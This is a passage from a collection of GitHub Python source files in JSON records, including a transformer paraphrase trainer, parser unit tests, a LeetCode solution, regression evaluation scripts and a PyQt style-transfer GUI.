další příklad? y / n: \")\n if odpoved == \"y\" or odpoved == \"Y\":\n nezadano = False\n elif odpoved == \"n\" or odpoved == \"N\":\n nezadano = False\n pokracovat = False\n else:\n pass\ninput(\"\\nStiskněte libovolnou klávesu...\")","repo_name":"Miky9/Py-BasicSyntax","sub_path":"ITN/3_Kalkulacka.py","file_name":"3_Kalkulacka.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17514510114","text":"DATABASE_NAME = '17K_PDB_three_sequences.db'\n\nimport input_files as input_data\n\nimport sqlite3\nconn = sqlite3.connect(DATABASE_NAME)\n\nc = conn.cursor()\n\nc.execute(\"DROP TABLE IF EXISTS sequences\")\nc.execute('''CREATE TABLE sequences (seq text,\n acid_a text, acid_b text, acid_c text,\n acid_a_phi real, acid_a_psi real,\n acid_b_phi real, acid_b_psi real,\n acid_c_phi real, acid_c_psi real)''')\n\ndef parse_rama_file(RAMA_NAME):\n \n sequence_data = []\n sql_input_data = []\n\n with open('output_big/' + RAMA_NAME) as f:\n \tsequence_data = f.readlines()\n\n sequence = sequence_data[1:] #first line is column data\n\n number_acids = len(sequence)\n\n i = 2 #throw away the first and last amino acid\n while i int:\n NSL = []\n NSR = []\n stack = []\n for i in range(len(arr)):\n while len(stack) > 0 and stack[-1][0] >= arr[i]:\n stack.pop()\n if len(stack) == 0:\n NSL.append(-1)\n else:\n NSL.append(stack[-1][1])\n stack.append((arr[i], i))\n stack = []\n for i in range(len(arr) - 1, -1, -1):\n while len(stack) > 0 and stack[-1][0] > arr[i]:\n stack.pop()\n if len(stack) == 0:\n NSR.append(len(arr))\n else:\n NSR.append(stack[-1][1])\n stack.append((arr[i], i))\n NSR = NSR[::-1]\n s = 0\n for i in range(len(arr)):\n a = i - NSL[i]\n b = NSR[i] - i\n s += a * b * arr[i]\n return s % 1000000007","repo_name":"NirajPatel07/Leetcode-Problems","sub_path":"0907-sum-of-subarray-minimums/0907-sum-of-subarray-minimums.py","file_name":"0907-sum-of-subarray-minimums.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7610492486","text":"import os\nfrom imblearn.under_sampling import TomekLinks\n\n\nclass Sampling(object):\n def __init__(self, sampler):\n self.sampler = sampler\n self.random_seed = 101\n self.njobs = os.cpu_count()\n\n def get_sampler(self):\n sampler = None\n\n if self.sampler == 'tomek-links':\n sampler = TomekLinks(random_state=self.random_seed, n_jobs=self.njobs)\n\n return sampler\n","repo_name":"studiawan/pylogsentiment","sub_path":"pylogsentiment/imbalance/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"5523566189","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchtext\nfrom torchtext.data import Field, BucketIterator, Iterator, TabularDataset\n\nfrom bpemb import BPEmb\nimport numpy as np\n\nimport random\nimport math\nimport time\n\n\nSEED = 1234\n\nrandom.seed(SEED)\nnp.random.seed(SEED)\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\n\nbpemb = BPEmb(lang=\"ru\", vs=50000)\n\nfield = Field(tokenize = lambda line: bpemb.encode(line.strip('\\n')), \n init_token = '', \n eos_token = '', \n lower = True, \n batch_first = True)\n\ndata = TabularDataset(path='train.сsv',\n format='csv', fields=[('original', field), ('paraphrase', field)])\ntest_data, 
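The monotonic-stack solution above runs in O(n); it can be cross-checked against a direct O(n^2) enumeration of every subarray's minimum. On the classic example `[3, 1, 2, 4]` both give 17:

```python
def sum_subarray_mins_naive(arr):
    # Brute force for testing only: extend each window and track its minimum.
    total = 0
    for i in range(len(arr)):
        m = arr[i]
        for j in range(i, len(arr)):
            m = min(m, arr[j])
            total += m
    return total % 1000000007

print(sum_subarray_mins_naive([3, 1, 2, 4]))  # 17
```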
train_data = data.split(split_ratio=0.05)\n\nfield.build_vocab(train_data, min_freq = 2)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nBATCH_SIZE = 256\n\ntrain_iterator, test_iterator = BucketIterator.splits((train_data, test_data), \n batch_size = BATCH_SIZE,\n sort=False,\n device=device)\n\nclass Encoder(nn.Module):\n def __init__(self, \n input_dim, \n hid_dim, \n n_layers, \n n_heads, \n pf_dim,\n dropout, \n device,\n max_length = 100):\n super().__init__()\n\n self.device = device\n \n self.tok_embedding = nn.Embedding(input_dim, hid_dim)\n self.pos_embedding = nn.Embedding(max_length, hid_dim)\n \n self.layers = nn.ModuleList([EncoderLayer(hid_dim, \n n_heads, \n pf_dim,\n dropout, \n device) \n for _ in range(n_layers)])\n \n self.dropout = nn.Dropout(dropout)\n \n self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)\n \n def forward(self, src, src_mask):\n \n #src = [batch size, src len]\n #src_mask = [batch size, src len]\n \n batch_size = src.shape[0]\n src_len = src.shape[1]\n \n pos = torch.arange(0, src_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)\n \n #pos = [batch size, src len]\n \n src = self.dropout((self.tok_embedding(src) * self.scale) + self.pos_embedding(pos))\n \n #src = [batch size, src len, hid dim]\n \n for layer in self.layers:\n src = layer(src, src_mask)\n \n #src = [batch size, src len, hid dim]\n \n return src\n\nclass EncoderLayer(nn.Module):\n def __init__(self, \n hid_dim, \n n_heads, \n pf_dim, \n dropout, \n device):\n super().__init__()\n \n self.layer_norm = nn.LayerNorm(hid_dim)\n self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)\n self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim, \n pf_dim, \n dropout)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, src, src_mask):\n \n #src = [batch size, src len, hid dim]\n #src_mask = [batch size, src len]\n \n #self attention\n _src, _ = self.self_attention(src, src, src, src_mask)\n \n #dropout, residual connection and layer norm\n src = self.layer_norm(src + self.dropout(_src))\n \n #src = [batch size, src len, hid dim]\n \n #positionwise feedforward\n _src = self.positionwise_feedforward(src)\n \n #dropout, residual and layer norm\n src = self.layer_norm(src + self.dropout(_src))\n \n #src = [batch size, src len, hid dim]\n \n return src\n\nclass MultiHeadAttentionLayer(nn.Module):\n def __init__(self, hid_dim, n_heads, dropout, device):\n super().__init__()\n \n assert hid_dim % n_heads == 0\n \n self.hid_dim = hid_dim\n self.n_heads = n_heads\n self.head_dim = hid_dim // n_heads\n \n self.fc_q = nn.Linear(hid_dim, hid_dim)\n self.fc_k = nn.Linear(hid_dim, hid_dim)\n self.fc_v = nn.Linear(hid_dim, hid_dim)\n \n self.fc_o = nn.Linear(hid_dim, hid_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n self.scale = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)\n \n def forward(self, query, key, value, mask = None):\n \n batch_size = query.shape[0]\n \n #query = [batch size, query len, hid dim]\n #key = [batch size, key len, hid dim]\n #value = [batch size, value len, hid dim]\n \n Q = self.fc_q(query)\n K = self.fc_k(key)\n V = self.fc_v(value)\n \n #Q = [batch size, query len, hid dim]\n #K = [batch size, key len, hid dim]\n #V = [batch size, value len, hid dim]\n \n Q = Q.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)\n K = K.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)\n V = V.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 
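`MultiHeadAttentionLayer` above splits the hidden dimension into heads with a `view` followed by a `permute`. A two-step shape walk-through using the same hyperparameters (`hid_dim = 256`, 8 heads):

```python
import torch

batch, seq, hid, heads = 2, 5, 256, 8
x = torch.randn(batch, seq, hid)             # [batch, seq, hid]
x = x.view(batch, seq, heads, hid // heads)  # [batch, seq, heads, head_dim]
x = x.permute(0, 2, 1, 3)                    # [batch, heads, seq, head_dim]
print(x.shape)  # torch.Size([2, 8, 5, 32])
```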
2, 1, 3)\n \n #Q = [batch size, n heads, query len, head dim]\n #K = [batch size, n heads, key len, head dim]\n #V = [batch size, n heads, value len, head dim]\n \n energy = torch.matmul(Q, K.permute(0, 1, 3, 2)) / self.scale\n \n #energy = [batch size, n heads, seq len, seq len]\n \n if mask is not None:\n energy = energy.masked_fill(mask == 0, -1e10)\n \n attention = torch.softmax(energy, dim = -1)\n \n #attention = [batch size, n heads, query len, key len]\n \n x = torch.matmul(self.dropout(attention), V)\n \n #x = [batch size, n heads, seq len, head dim]\n \n x = x.permute(0, 2, 1, 3).contiguous()\n \n #x = [batch size, seq len, n heads, head dim]\n \n x = x.view(batch_size, -1, self.hid_dim)\n \n #x = [batch size, seq len, hid dim]\n \n x = self.fc_o(x)\n \n #x = [batch size, seq len, hid dim]\n \n return x, attention\n\nclass PositionwiseFeedforwardLayer(nn.Module):\n def __init__(self, hid_dim, pf_dim, dropout):\n super().__init__()\n \n self.fc_1 = nn.Linear(hid_dim, pf_dim)\n self.fc_2 = nn.Linear(pf_dim, hid_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n def forward(self, x):\n \n #x = [batch size, seq len, hid dim]\n \n x = self.dropout(torch.relu(self.fc_1(x)))\n \n #x = [batch size, seq len, pf dim]\n \n x = self.fc_2(x)\n \n #x = [batch size, seq len, hid dim]\n \n return x\n\nclass Decoder(nn.Module):\n def __init__(self, \n output_dim, \n hid_dim, \n n_layers, \n n_heads, \n pf_dim, \n dropout, \n device,\n max_length = 100):\n super().__init__()\n \n self.device = device\n \n self.tok_embedding = nn.Embedding(output_dim, hid_dim)\n self.pos_embedding = nn.Embedding(max_length, hid_dim)\n \n self.layers = nn.ModuleList([DecoderLayer(hid_dim, \n n_heads, \n pf_dim, \n dropout, \n device)\n for _ in range(n_layers)])\n \n self.fc_out = nn.Linear(hid_dim, output_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)\n \n def forward(self, trg, enc_src, trg_mask, src_mask):\n \n #trg = [batch size, trg len]\n #enc_src = [batch size, src len, hid dim]\n #trg_mask = [batch size, trg len]\n #src_mask = [batch size, src len]\n \n batch_size = trg.shape[0]\n trg_len = trg.shape[1]\n \n pos = torch.arange(0, trg_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)\n \n #pos = [batch size, trg len]\n \n trg = self.dropout((self.tok_embedding(trg) * self.scale) + self.pos_embedding(pos))\n \n #trg = [batch size, trg len, hid dim]\n \n for layer in self.layers:\n trg, attention = layer(trg, enc_src, trg_mask, src_mask)\n \n #trg = [batch size, trg len, hid dim]\n #attention = [batch size, n heads, trg len, src len]\n \n output = self.fc_out(trg)\n \n #output = [batch size, trg len, output dim]\n \n return output, attention\n\nclass DecoderLayer(nn.Module):\n def __init__(self, \n hid_dim, \n n_heads, \n pf_dim, \n dropout, \n device):\n super().__init__()\n \n self.layer_norm = nn.LayerNorm(hid_dim)\n self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)\n self.encoder_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)\n self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim, \n pf_dim, \n dropout)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, trg, enc_src, trg_mask, src_mask):\n \n #trg = [batch size, trg len, hid dim]\n #enc_src = [batch size, src len, hid dim]\n #trg_mask = [batch size, trg len]\n #src_mask = [batch size, src len]\n \n #self attention\n _trg, _ = self.self_attention(trg, trg, trg, trg_mask)\n \n #dropout, residual connection and 
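The energy/softmax steps above are standard scaled dot-product attention, with masked positions pushed to `-1e10` so they receive effectively zero weight. The same computation isolated as a function; a sketch, not the module's API:

```python
import torch

def scaled_dot_product_attention(Q, K, V, mask=None):
    scale = torch.sqrt(torch.tensor(Q.shape[-1], dtype=torch.float))
    energy = torch.matmul(Q, K.transpose(-2, -1)) / scale
    if mask is not None:
        energy = energy.masked_fill(mask == 0, -1e10)  # ~zero after softmax
    attention = torch.softmax(energy, dim=-1)
    return torch.matmul(attention, V), attention

Q = K = V = torch.randn(2, 8, 5, 32)  # [batch, heads, seq, head_dim]
out, attn = scaled_dot_product_attention(Q, K, V)
print(out.shape, attn.shape)  # [2, 8, 5, 32] and [2, 8, 5, 5]
```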
layer norm\n trg = self.layer_norm(trg + self.dropout(_trg))\n \n #trg = [batch size, trg len, hid dim]\n \n #encoder attention\n _trg, attention = self.encoder_attention(trg, enc_src, enc_src, src_mask)\n \n #dropout, residual connection and layer norm\n trg = self.layer_norm(trg + self.dropout(_trg))\n \n #trg = [batch size, trg len, hid dim]\n \n #positionwise feedforward\n _trg = self.positionwise_feedforward(trg)\n \n #dropout, residual and layer norm\n trg = self.layer_norm(trg + self.dropout(_trg))\n \n #trg = [batch size, trg len, hid dim]\n #attention = [batch size, n heads, trg len, src len]\n \n return trg, attention\n\nclass Seq2Seq(nn.Module):\n def __init__(self, \n encoder, \n decoder, \n src_pad_idx, \n trg_pad_idx, \n device):\n super().__init__()\n \n self.encoder = encoder\n self.decoder = decoder\n self.src_pad_idx = src_pad_idx\n self.trg_pad_idx = trg_pad_idx\n self.device = device\n \n def make_src_mask(self, src):\n \n #src = [batch size, src len]\n \n src_mask = (src != self.src_pad_idx).unsqueeze(1).unsqueeze(2)\n\n #src_mask = [batch size, 1, 1, src len]\n\n return src_mask\n \n def make_trg_mask(self, trg):\n \n #trg = [batch size, trg len]\n \n trg_pad_mask = (trg != self.trg_pad_idx).unsqueeze(1).unsqueeze(3)\n \n #trg_pad_mask = [batch size, 1, trg len, 1]\n \n trg_len = trg.shape[1]\n \n trg_sub_mask = torch.tril(torch.ones((trg_len, trg_len), device = self.device)).bool()\n \n #trg_sub_mask = [trg len, trg len]\n \n trg_mask = trg_pad_mask & trg_sub_mask\n \n #trg_mask = [batch size, 1, trg len, trg len]\n \n return trg_mask\n\n def forward(self, src, trg):\n \n #src = [batch size, src len]\n #trg = [batch size, trg len]\n \n src_mask = self.make_src_mask(src)\n trg_mask = self.make_trg_mask(trg)\n \n #src_mask = [batch size, 1, 1, src len]\n #trg_mask = [batch size, 1, trg len, trg len]\n \n enc_src = self.encoder(src, src_mask)\n \n #enc_src = [batch size, src len, hid dim]\n \n output, attention = self.decoder(trg, enc_src, trg_mask, src_mask)\n \n #output = [batch size, trg len, output dim]\n #attention = [batch size, n heads, trg len, src len]\n \n return output, attention\n\nINPUT_DIM = len(field.vocab)\nOUTPUT_DIM = len(field.vocab)\nHID_DIM = 256\nENC_LAYERS = 3\nDEC_LAYERS = 3\nENC_HEADS = 8\nDEC_HEADS = 8\nENC_PF_DIM = 512\nDEC_PF_DIM = 512\nENC_DROPOUT = 0.1\nDEC_DROPOUT = 0.1\n\nenc = Encoder(INPUT_DIM, \n HID_DIM, \n ENC_LAYERS, \n ENC_HEADS, \n ENC_PF_DIM, \n ENC_DROPOUT, \n device)\n\ndec = Decoder(OUTPUT_DIM, \n HID_DIM, \n DEC_LAYERS, \n DEC_HEADS, \n DEC_PF_DIM, \n DEC_DROPOUT, \n device)\n\nSRC_PAD_IDX = field.vocab.stoi[field.pad_token]\nTRG_PAD_IDX = field.vocab.stoi[field.pad_token]\n\nmodel = Seq2Seq(enc, dec, SRC_PAD_IDX, TRG_PAD_IDX, device).to(device)\n# model.load_state_dict(torch.load('/content/drive/My Drive/paraphraser 2.0/train/model.pt'))\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\nprint(f'The model has {count_parameters(model):,} trainable parameters')\n\ndef initialize_weights(m):\n if hasattr(m, 'weight') and m.weight.dim() > 1:\n nn.init.xavier_uniform_(m.weight.data)\n\nmodel.apply(initialize_weights);\n\nLEARNING_RATE = 0.0005\n\noptimizer = torch.optim.Adam(model.parameters(), lr = LEARNING_RATE)\n\ncriterion = nn.CrossEntropyLoss(ignore_index = TRG_PAD_IDX)\n\ndef train(model, iterator, optimizer, criterion, clip):\n \n model.train()\n \n epoch_loss = 0\n \n for i, batch in enumerate(iterator):\n \n src = batch.original\n trg = batch.paraphrase\n \n 
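`make_trg_mask` above ANDs a padding mask with a causal mask from `torch.tril`, so position `i` can only attend to positions up to `i`. The causal half printed on its own for a length-4 target:

```python
import torch

trg_len = 4
sub_mask = torch.tril(torch.ones((trg_len, trg_len))).bool()
print(sub_mask)
# tensor([[ True, False, False, False],
#         [ True,  True, False, False],
#         [ True,  True,  True, False],
#         [ True,  True,  True,  True]])
```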
optimizer.zero_grad()\n \n output, _ = model(src, trg[:,:-1])\n \n #output = [batch size, trg len - 1, output dim]\n #trg = [batch size, trg len]\n \n output_dim = output.shape[-1]\n \n output = output.contiguous().view(-1, output_dim)\n trg = trg[:,1:].contiguous().view(-1)\n \n #output = [batch size * trg len - 1, output dim]\n #trg = [batch size * trg len - 1]\n \n loss = criterion(output, trg)\n \n loss.backward()\n \n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n \n optimizer.step()\n \n epoch_loss += loss.item()\n \n return epoch_loss / len(iterator)\n\ndef evaluate(model, iterator, criterion):\n \n model.eval()\n \n epoch_loss = 0\n \n with torch.no_grad():\n \n for i, batch in enumerate(iterator):\n\n src = batch.original\n trg = batch.paraphrase\n\n output, _ = model(src, trg[:,:-1])\n \n #output = [batch size, trg len - 1, output dim]\n #trg = [batch size, trg len]\n \n output_dim = output.shape[-1]\n \n output = output.contiguous().view(-1, output_dim)\n trg = trg[:,1:].contiguous().view(-1)\n \n #output = [batch size * trg len - 1, output dim]\n #trg = [batch size * trg len - 1]\n \n loss = criterion(output, trg)\n\n epoch_loss += loss.item()\n \n return epoch_loss / len(iterator)\n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\nCLIP = 1\n\ntrain_losses_hist = [] \nval_losses_hist = []\n\nbest_valid_loss = 99999\n\nepoch = 1\nwhile True:\n\n start_time = time.time()\n \n train_loss = train(model, train_iterator, optimizer, criterion, CLIP)\n train_losses_hist.append(train_loss)\n\n valid_loss = evaluate(model, test_iterator, criterion)\n val_losses_hist.append(valid_loss)\n\n end_time = time.time()\n \n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(),\n 'model.pt')\n\n print(f'Epoch: {epoch+1:02} | Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. 
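`train` above applies teacher forcing: the decoder receives the target without its last token and is scored against the target without its first token, so every position predicts the next token. The one-token shift on a toy sequence:

```python
trg = ["<sos>", "w1", "w2", "<eos>"]
decoder_input = trg[:-1]  # ["<sos>", "w1", "w2"]   (what the decoder sees)
expected_out = trg[1:]    # ["w1", "w2", "<eos>"]   (what the loss compares against)
print(decoder_input, expected_out)
```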
PPL: {math.exp(valid_loss):7.3f}')\n\n    epoch += 1\n\n\ndef translate_sentence(sentence, field, model, device, max_len = 50):\n    \n    model.eval()\n    \n    tokens = field.preprocess(sentence)\n\n    tokens = [field.init_token] + tokens + [field.eos_token]\n        \n    src_indexes = [field.vocab.stoi[token] for token in tokens]\n\n    src_tensor = torch.LongTensor(src_indexes).unsqueeze(0).to(device)\n    \n    src_mask = model.make_src_mask(src_tensor)\n    \n    with torch.no_grad():\n        enc_src = model.encoder(src_tensor, src_mask)\n\n    trg_indexes = [field.vocab.stoi[field.init_token]]\n\n    for i in range(max_len):\n\n        trg_tensor = torch.LongTensor(trg_indexes).unsqueeze(0).to(device)\n\n        trg_mask = model.make_trg_mask(trg_tensor)\n        \n        with torch.no_grad():\n            output, attention = model.decoder(trg_tensor, enc_src, trg_mask, src_mask)\n        \n        pred_token = output.argmax(2)[:,-1].item()\n        \n        trg_indexes.append(pred_token)\n\n        if pred_token == field.vocab.stoi[field.eos_token]:\n            break\n    \n    trg_tokens = [field.vocab.itos[i] for i in trg_indexes]\n    \n    return trg_tokens[1:], attention\n\n\ninfer_df = []\n\nexample_idx = 600\n\nsrc = vars(test_data.examples[example_idx])['original']\ntrg = vars(test_data.examples[example_idx])['paraphrase']\n\n# translate once and strip the trailing eos token\ntranslation, attention = translate_sentence(src, field, model, device)\ntranslation = translation[:-1]\n\nbpe2sent = lambda x: ' '.join(''.join(x).split('▁'))\n\n# print(f'{bpe2sent(src)}')\n# print(f'{bpe2sent(trg)}')\n# print('\\n')\n# print(f'{bpe2sent(translation)}')\n\n# bpe2sent(translation)","repo_name":"merionum/neural-paraphrase-generation","sub_path":"train_universal_transformer.py","file_name":"train_universal_transformer.py","file_ext":"py","file_size_in_byte":19080,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74155515626","text":"import re\n\nfrom helpers import setup_path\n\nsetup_path()\n\nimport logging\nfrom logr import Logr\nLogr.configure(logging.DEBUG)\n\nfrom caper import Caper, Matcher\nfrom caper.parsers.base import Parser\nfrom caper.group import CaptureGroup\nfrom caper.objects import CaperClosure\nfrom caper.result import CaperResult\nfrom matchers import has_info\nfrom helpers import assert_result\nfrom hamcrest import *\nimport pytest\n\ncaper = Caper()\n\n\nclass DummyParser(Parser):\n    def __init__(self, pattern_groups, debug=False):\n        super(DummyParser, self).__init__(Matcher(pattern_groups), debug)\n\n\ndef build_parser(name='Show.Name.S01E03-GROUP'):\n    parser = DummyParser([\n        ('identifier', [\n            (1.0, [\n                r'^S(?P<season>\\d+)E(?P<episode>\\d+)$',\n            ])\n        ])\n    ])\n\n    # Parse test name into closures\n    closures = caper._closure_split(name)\n    closures = caper._fragment_split(closures)\n    parser.setup(closures)\n\n    return parser\n\n\ndef test_fragment_constraint():\n    parser = build_parser()\n\n    # Capture show name until we hit the identifier\n    group = CaptureGroup(parser, parser.result)\\\n        .capture_fragment('show_name', single=False)\\\n        .until_fragment(node__re='identifier')\n\n    # TODO test CaptureStep.__repr__ properly\n    repr(group.steps)\n\n    group.execute()\n\n    # Build the result from tree\n    parser.result.build()\n\n    # Ensure result is valid\n    assert_result(parser.result, (1.0, {\n        'show_name': ['Show', 'Name']\n    }))\n\n\ndef test_pattern_constraint():\n    parser = build_parser()\n\n    # Capture show name until we hit the identifier\n    CaptureGroup(parser, parser.result) \\\n        .capture_fragment('show_name', single=False) \\\n        
.until_fragment(right_sep__re=re.compile('^-$')) \\\n        .execute()\n\n    # Build the result from tree\n    parser.result.build()\n\n    # Ensure result is valid\n    assert_result(parser.result, (1.0, {\n        'show_name': ['Show', 'Name']\n    }))\n\n\ndef test_value_constraint():\n    parser = build_parser()\n\n    # Capture show name until we hit the identifier\n    CaptureGroup(parser, parser.result) \\\n        .capture_fragment('show_name', single=False) \\\n        .until_fragment(value__re='identifier') \\\n        .execute()\n\n    # Build the result from tree\n    parser.result.build()\n\n    # Ensure result is valid\n    assert_result(parser.result, (1.0, {\n        'show_name': ['Show', 'Name']\n    }))\n\n\ndef test_invalid_attribute():\n    parser = build_parser()\n\n    # Capture show name until we hit the identifier\n    with pytest.raises(ValueError) as exc:\n        CaptureGroup(parser, parser.result) \\\n            .capture_fragment('show_name', single=False) \\\n            .until_fragment(blah__re='identifier') \\\n            .execute()\n\n    assert_that(\n        str(exc.value),\n        equal_to(\"Unknown constraint match type 'blah'\")\n    )\n","repo_name":"fuzeman/Caper","sub_path":"tests/test_constraints.py","file_name":"test_constraints.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"71695177067","text":"#tech_lab1\r\n\r\n\r\nfile1 = open('','r')\r\nfile2 = open('','r')\r\n\r\n\r\nlines1 = []\r\nlines2 = []\r\n\r\n\r\nfor line in file1:\r\n    lines1.append(line)\r\n\r\nfor line in file2:\r\n    lines2.append(line)\r\n\r\nprint(\"file1:\")\r\nfor element in lines1:\r\n    if not element in lines2:\r\n        print(element, end=\"\")\r\n\r\nprint(\"\\n\\nfile2:\")\r\nfor element in lines2:\r\n    if not element in lines1:\r\n        print(element, end=\"\")\r\n        \r\nfile1.close()\r\nfile2.close()\r\n","repo_name":"zhanchi5/tech_lab1","sub_path":"tech_lab1.py","file_name":"tech_lab1.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10261264127","text":"from sklearn import metrics\nfrom sklearn.metrics import r2_score\nfrom MS1 import TestScript\nimport pickle\nimport pandas as pd\nimport os\ndef test1(filepath):\n    df = pd.read_csv(filepath)\n    #df = df.head(1000)\n    df = TestScript.TestScript(df, \"MS1/\").clean()\n    X = df.drop(columns=['Reviewer_Score'])\n    y = df['Reviewer_Score']\n\n    linearRegression = pickle.load(open(\"MS1/Linear_Regression.sav\", 'rb'))\n    polynomialRegression = pickle.load(open(\"MS1/polynomial_regression.sav\", 'rb'))\n    poly_features = pickle.load(open(\"MS1/polynomial_features.sav\", 'rb'))\n    randomForest = pickle.load(open(\"MS1/random_forest.sav\", 'rb'))\n    ridgeRegression = pickle.load(open(\"MS1/Ridge_Regression.sav\", 'rb'))\n\n    linear_pred = linearRegression.predict(X)\n    print('linear Mean Square Error = ', metrics.mean_squared_error(y, linear_pred))\n    score = r2_score(y, linear_pred)\n    print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n    df['Linear_Regression'] = linear_pred\n\n    X_poly = poly_features.fit_transform(X)\n    poly_pred = polynomialRegression.predict(X_poly)\n    print('polynomial regression Mean Square Error = ', metrics.mean_squared_error(y, poly_pred))\n    score = r2_score(y, poly_pred)\n    print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n    df['Polynomial_Regression'] = poly_pred\n\n    randomForest_pred = randomForest.predict(X)\n    print('random forest Mean Square Error = ', metrics.mean_squared_error(y, 
randomForest_pred))\n    score = r2_score(y, randomForest_pred)\n    print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n    df['Random_Forest'] = randomForest_pred\n\n    ridge_pred = ridgeRegression.predict(X)\n    print('ridge regression Mean Square Error = ', metrics.mean_squared_error(y, ridge_pred))\n    score = r2_score(y, ridge_pred)\n    print(\"R-squared score: {:.2f}\".format(score)+\"\\n-------------------------\")\n    df['Ridge_Regression'] = ridge_pred\n    df.to_csv('test1.csv')\n    os.startfile('test1.csv')\n","repo_name":"Yasmine-Khaled/Hotel-Rating-Prediction","sub_path":"Hotel Rating Prediction/Hotel Rating Prediction/Test1.py","file_name":"Test1.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74221274028","text":"import pickle\n# load the trained model\nwith open('svr_model.pkl', 'rb') as model_file:\n    loaded_model = pickle.load(model_file)\n\n# the slope and actual speed command we want to predict for\nslope = 8  # slope in degrees\nactual_speed = 10  # actual speed command\n\n# custom logic: adjust the slope and re-predict until the prediction is consistent\nwhile True:\n    # run the prediction\n    predicted_output = loaded_model.predict([[slope, actual_speed]])\n\n    if slope > 0 and predicted_output < actual_speed:\n        # positive slope: if the predicted speed command is below the actual speed, increase the slope by 1 degree and re-predict\n        slope += 1\n    elif slope < 0 and predicted_output > actual_speed:\n        # negative slope: if the predicted speed command is above the actual speed, decrease the slope by 1 degree and re-predict\n        slope -= 1\n    else:\n        # the condition is satisfied, exit the loop\n        break\n\nprint(\"Predicted speed command (after the logic check):\", predicted_output[0])\n","repo_name":"sakurashang/steadySpeedControl","sub_path":"predictSpeed/testSVR.py","file_name":"testSVR.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2530422107","text":"\r\nimport sys\r\nimport train\r\nfrom PyQt5 import QtGui\r\nfrom PyQt5.QtCore import QBasicTimer, Qt\r\nfrom PyQt5.QtWidgets import *\r\nfrom settings import setpath,setpath2,setbeta\r\nfrom PyQt5.QtGui import QPixmap\r\n\r\nclass GUI(QWidget):\r\n    def __init__(self):\r\n        super(GUI, self).__init__()\r\n        self.initUI()\r\n    def initUI(self):\r\n        self.setWindowTitle('Style Transfer Master')\r\n        self.setGeometry(300, 300, 1000, 600)\r\n        #self.setWindowTitle('')\r\n        #self.label2 = QLabel('Let\\'s magic your picture', self)\r\n        #self.move(self,200)\r\n        #self.pbar = QProgressBar(self)\r\n        #self.pbar.setGeometry(130, 20, 300, 25)\r\n        #self.timer = QBasicTimer()\r\n        #self.step = 0\r\n        self.bar = QSlider(Qt.Horizontal, self)\r\n        self.bar.setRange(0, 100)\r\n        #bar.setGeomerty(100,100,100,100)\r\n        self.bar.setGeometry(200*2, 20*2, 100*2, 30*2)\r\n        self.bar.valueChanged.connect(self.barfunc)\r\n        self.bar.setMinimum(10)\r\n        #self.bar.slierReleased.connect(self.barfunc)\r\n        #bar.setSliderPosition(100)\r\n        #self.bar.move(200.200)\r\n\r\n\r\n\r\n        #start button\r\n        self.gobuton = QPushButton('Go!', self)\r\n        self.gobuton.resize(self.gobuton.sizeHint())\r\n        self.gobuton.move(210*2, 250*2)\r\n        self.gobuton.clicked.connect(self.go)\r\n        #self.gobuton.clicked.connect(self.Action)\r\n        self.gobuton.clicked.connect(train.train)\r\n\r\n        self.label = QLabel(self)\r\n        #self.label.setText(\"Display image\")\r\n        self.label.setFixedSize(220*2, 180*2)\r\n        self.label.move(20*2, 50*2)\r\n        